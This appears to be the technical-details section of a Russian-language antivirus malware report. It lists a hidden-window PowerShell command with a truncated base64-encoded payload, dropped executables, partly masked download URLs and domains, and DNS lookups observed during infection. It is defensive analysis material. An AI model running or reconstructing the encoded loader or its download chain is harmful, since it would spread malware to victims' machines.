Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABVAG8AdwBnAGcAYgB3AGIAaQBhAG0AYgBnAD0AJwBCAHcAdAB2AGYAeAB3AHAAaABlAHIAaAAnADsAJABJAG4AYgByAGUAdgBuAGkAagAgAD0AIAAnADcANwAwACcAOwAkAEgAdABrAHgAYwBrAGMAYwBkAHkAPQAnAEsAZwB2AGwAdgB...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1584
- %TEMP%\1282359.cvr
- %HOMEPATH%\770.exe
- %HOMEPATH%\770.exe
- 'bu######.podcastwebsites.com':80
- '36##an.com':80
- '36##an.com':443
- http://bu######.podcastwebsites.com/cgi-bin/TNkruNAc/
- http://bu######.podcastwebsites.com/cgi-sys/suspendedpage.cgi
- http://36##an.com/42142/13xj532xpk-spit-84585131/
- '36##an.com':443
- DNS ASK 18#####30.tbmyoweb.com
- DNS ASK bt##ndy.in
- DNS ASK bu######.podcastwebsites.com
- DNS ASK 36##an.com
- DNS ASK bo##go.xyz
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABVAG8AdwBnAGcAYgB3AGIAaQBhAG0AYgBnAD0AJwBCAHcAdAB2AGYAeAB3AHAAaABlAHIAaAAnADsAJABJAG4AYgByAGUAdgBuAGkAagAgAD0AIAAnADcANwAwACcAOwAkAEgAdABrAHgAYwBrAGMAYwBkAHkAPQAnAEsAZwB2AGwAdgB...' (со скрытым окном)